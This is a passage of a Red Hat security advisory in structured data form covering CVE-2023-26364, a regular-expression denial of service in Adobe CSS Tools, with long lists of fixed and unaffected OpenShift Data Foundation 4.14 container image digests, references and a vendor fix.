"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2250364", }, ], notes: [ { category: "description", text: "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.", title: "Vulnerability description", }, { category: "summary", text: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26364", }, { category: "external", summary: "RHBZ#2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26364", url: "https://www.cve.org/CVERecord?id=CVE-2023-26364", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", }, { category: "external", summary: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", url: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", }, ], release_date: "2023-11-17T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "workaround", details: "No mitigation is yet available for this vulnerability.", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", 